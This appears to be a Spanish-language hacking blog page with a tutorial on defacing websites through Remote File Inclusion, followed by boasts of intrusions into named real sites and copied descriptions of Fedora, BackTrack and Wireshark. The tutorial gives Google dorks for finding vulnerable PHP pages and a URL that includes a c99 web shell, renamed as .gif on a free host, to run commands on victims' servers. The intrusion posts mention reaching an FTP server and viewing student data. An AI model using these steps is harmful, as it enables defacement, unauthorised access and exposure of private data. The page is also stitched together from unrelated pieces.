Tutorial RFI ( Defacing )

***********
RFI
***********

1- Que es RFI?
2- Que es una SHELL?
3- Como encontrar una web vulnerable?
4- Como explotar la vulnerabilidad?
5- Dejando nuesra marca
6- Como evitar que nos lo hagan a nosotros

***************
Que es RFI?
***************

RFI (Remote File Inclusion) es una vulnerabilidad que solamente existe en paginas dinamicas como php que permite enlazar archivos que estan en servidores remotos, esta vulnerabilidad se produce por una mala programacion del webmaster usando la funcion include()
Una web vulnerable podria ser:
www.victima.com/index.php?page=videos.php
Esta pagina lo que esta haciendo es incluir el documento "videos.php".
Nos aprovecharemos de esto incluyendo nuestros propios archivos pero para eso necesitamos una shell.

*********************
Que es una shell?
*********************

Una shell es un interrete de ordenes y comandos. Es una interfaz para comunicar el usuario con el sistema operativo.
Esto para que nos sirve en nuestro deface pensaras? Pues esta claro! Con esto ejecutaremos comandos en la web victima.

**********************************
Como encontrar una web vulnerable?
**********************************

Como encontrar una web vulnerable? Pues con google!
Podemos encontrarlas haciendo busquedas del tipo:
allinurl:index.php?page= .php
y variantes, en vez de page otra cosa similar como: go, pg, ir, ...

************************************
Como explotar la vulnerabilidad?
************************************

Vamos a ver como explotar la vulnerabilidad, tenemos la web
www.victima.com/index.php?page=videos.php
para comprobar que es vulnerable vamos a poner:
page=http://www.zerooo.es (no olvides el http que es muy importante!)
y quedaria algo como...
www.victima.com/index.php?page=http://www.zerooo.es
si ves que nuestra bonita web se carga dentro de esa web, enhorabuena! aunque no siempre esta asegurado el deface...
ahora vamos a meter nuestra shell ahi, hay muchos tipos de shell, yo recomiendo la c99 ya que es muy facil de usar, asi que la descargamos de esta misma web
y si no esta en .gif la ponemos como .gif ya que si estuviera .php se ejecutaria en nuestro servidor.
Ahora la subimos a un hosting gratuito mismo como iespana por ejemplo y vamos a nuestra victima y escribimos donde estaba zerooo la direccion de la shell por ejemplo:
www.victima.com/index.php?page=http://tuweb.com/c99.gif? (Ojo con el ? que a veces es importante)
ahora si todo a salido bien deberia abrirse la shell y ahi veriamos lo que podemos hacer, yo recomiendo NO BORRAR NADA pro bueno yo no voy a decir lo que debeis o no debeis hacer

*************************
deben bajarse una web shell, para poder realizar este ataque, busquen la c99 saludos!

html inyección a www.govisitcostarica.com

analizando un día la web, encontré en varias peticiones la ejecución de html, como se muestra en las siguientes capturas :D xD!

intrusión a www.meritresearch.com

isql

intrusión a www.amskrupajal.org

aca en el server ftp :D

dejando el archivo..

aca viendo info de alumnos..

Fedora (Linux)

Exactamente, ¿qué es Fedora?

Fedora es un sistema operativo basado en Linux, un conjunto de software que hace funcionar a su computadora. Usted puede utilizar el sistema operativo Fedora para remplazar otros sistemas operativos, o utilizarlo en conjunto con éstos, por ejemplo mantener Microsoft Windows (TM) o Mac OS X (TM) en una partición diferente. El sistema operativo Fedora es gratuito tanto para disfrutarlo como para compartirlo.
web
http://fedoraproject.org/es/

BackTrack 4

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a laseguridad informática.

Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor +WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.¹

Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits,sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.^{2
es exelente yo lo uso :D
sitio:
www.backtrack-linux.org}

WireShark Network Protocol Analyzer

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo desoftware y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.

Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, y Mac OS X, así como en Microsoft Windows.
web
www.wireshark.org